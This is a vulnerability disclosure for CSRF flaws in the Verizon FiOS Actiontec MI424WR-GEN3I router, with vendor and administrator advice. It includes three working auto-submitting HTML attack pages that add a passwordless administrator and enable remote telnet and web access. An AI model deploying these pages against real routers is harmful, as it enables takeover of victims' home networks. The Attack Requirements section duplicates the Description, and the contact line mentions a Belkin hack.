Taking over the Verizon FiOS Actiontec Model MI424WR-GEN3I

[return to summary]

  • The Verizon Actiontec can be taken over by a remote adversary through CSRF attack.

Description

The Verizon FiOS Actiontec MI424WR-GEN3I router is susceptible to several CSRF attacks, which allow an attacker to forge HTML forms and execute actions on behalf of a legitimate user. ISE created a proof of concept that when executed by an unsuspecting device administrator, adds an additional administrator account and enables remote web and telnet management services.

Attack Requirements

The Verizon FiOS Actiontec MI424WR-GEN3I router is susceptible to several CSRF attacks, which allow an attacker to forge HTML forms and execute actions on behalf of a legitimate user. ISE created a proof of concept that when executed by an unsuspecting device administrator, adds an additional administrator account and enables remote web and telnet management services.

Details

All HTML forms present in the Verizion FiOS Actiontec MI424WR-GEN3I are susceptible to Cross-Site Request Forgery.

  • Vulnerable Firmware is 40.19.36.
  • Other versions of firmware were not tested.

Impact

A successful attack exploiting this vulnerability can give a remote adversary full control of the victim router.

Recommendations to the vendor

  • Cross-Site request forgery can be prevented by including an unpredictable token in each HTTP request submitted to the web server. At a minimum, these tokens should be unique to each user, but it is recommended that each HTML form delivered contain a unique token.
  • In addition to HTML form tokens, HTTP refferer checking should be enabled.
  • Additional information for vendors regarding immediate and long term fixes for these issues can be found on our summary page here.

Recommendations to device administrators

  • (4/13/2013) There is not currently an available firmware upgrade that will remedy this vulnerability.
  • Take additional preventative measures and precautions by following the steps outlined on our summary page here.

Proof of Concept

In the following proof of concept attack, we assume that an Actiontec device administrator with an active management session established with the router has browsed to a malicious web page. Once there, a series of automatic form submissions take place, one after the other, to the administrator's router, from the administrator's browser. Since the administrator has a current session established with the Actiontec router, the form submissions are processed.

The first form (Figure 1) is pre-filled out with the information required to add a new administrative user to the router. The form is automatically submitted after a 1 second delay, and the victim's browser is then redirected to a second page.


<html>
<title>Actiontec Verizon FiOS CSRF - Adding Administrator User</title>
<!--Actiontec Model: MI424WR-GEN3I -->
<!--Firmware Version: 40.19.36 -->
<h1>Please sit tight while we upgrade your router</h1>

<body>

<form name="verizonActiontec" action="http://192.168.1.1/index.cgi" method="post">
<input type="hidden" name="active_page" value="101"/>
<input type="hidden" name="page_title" value="User Settings"/>
<input type="hidden" name="mimic_button_field" value="submit_button_submit: .."/>
<input type="hidden" name="button_value" value="."/>
<input type="hidden" name="strip_page_top" value="0"/>
<input type="hidden" name="user_id" value="-1"/>
<input type="hidden" name="fullname_defval" value=""/>
<input type="hidden" name="fullname" value="g42"/>
<input type="hidden" name="username_defval" value=""/>
<input type="hidden" name="username" value="G42"/>
<input type="hidden" name="user_level" value="2"/>
<input type="hidden" name="email_system_notify_level" value="15"/>
<input type="hidden" name="email_security_notify_level" value="15"/>
</form>

<script>
function CSRF1() {window.open("http://10.0.1.101/verizonFIOS2.html");};
window.setTimeout(CSRF1,1000)
function CSRF2() {document.verizonActiontec.submit();};
window.setTimeout(CSRF2,1000)
</script>

</body>
</html>

Figure 1. Attack page 1.

This second page (Figure 2) is pre-filled with the information required to add a user with no password. Again, the form is automatically submitted on behalf of the victim, and then redirects to a third page.


<html>
<title>Actiontec Verizon FiOS CSRF2 - Add User w/ No Pass Confirmation</title>

<body>

<form name="verizonActiontecC" action="http://192.168.1.1/index.cgi" 
	method="post">
<input type="hidden" name="active_page" value="101"/>
<input type="hidden" name="page_title" value="User Settings"/>
<input type="hidden" name="mimic_button_field" 
	value="submit_button_confirm_submit: .."/>
<input type="hidden" name="button_value" value="."/>
<input type="hidden" name="strip_page_top" value="0"/>
</form>

<script>
function CSRF1() {window.open("http://10.0.1.101/verizonFIOS3.html");};
window.setTimeout(CSRF1,0500)
function CSRF2() {document.verizonActiontecC.submit();};
window.setTimeout(CSRF2,0500)
</script>

</body>
</html>

Figure 2. Attack page 2.

The third page (Figure 3) is pre-filled with the information required to enable remote administration of the Actiontec. The attack is complete.


<html>
<title>Actiontec Verizon FIOS CSRF3 - Enable Remote Administration</title>

<body>

<form name="verizonActiontecRemote" action="http://192.168.1.1/index.cgi" 
	method="post">
<input type="hidden" name="active_page" value="9078"/>
<input type="hidden" name="active_page_str" value="page_remote_admin"/>
<input type="hidden" name="page_title" value="Remote Administration"/>
<input type="hidden" name="mimic_button_field" value="submit_button_submit: .."/>
<input type="hidden" name="button_value" value=""/>
<input type="hidden" name="strip_page_top" value="0"/>
<input type="hidden" name="is_telnet_primary" value="1"/>
<input type="hidden" name="is_telnet_primary_defval" value="0"/>
<input type="hidden" name="is_telnet_secondary_defval" value="0"/>
<input type="hidden" name="is_telnet_ssl_defval" value="0"/>
<input type="hidden" name="is_http_primary_defval" value="0"/>
<input type="hidden" name="is_http_secondary_defval" value="0"/>
<input type="hidden" name="is_https_primary_defval" value="0"/>
<input type="hidden" name="is_https_secondary_defval" value="0"/>
<input type="hidden" name="is_diagnostics_icmp_defval" value="0"/>
<input type="hidden" name="is_diagnostics_traceroute_defval" value="0"/>
<input type="hidden" name="is_telnet_secondary" value="1"/>
</form>

<script>
function CSRF1() {document.verizonActiontecRemote.submit();};
window.setTimeout(CSRF1,0000)
</script>

</body>
</html>

Figure 3. Attack page 3.

At this point, the attacker can remotely administer, and thereby remotely control the Actiontec.

References

  • Advisory/Video: Hak42 InfoSec
  • US Cert Disclosure: Cert Advisory
  • CVE-2013-0126: Cross-Site Request Forgery
  • CVE-2013-3097: Cross-Site Scripting

Credit

  • Discovered By: Jacob Holcomb – Security Analyst @ Independent Security Evaluators
  • Exploited By: Jacob Holcomb – Security Analyst @ Independent Security Evaluators

Contact Information

  • For more information on this particular Belkin hack, you can contact us at routers@www.ise.io
  • Alternatively, for more general information on ISE, you can reach us using contact@www.ise.io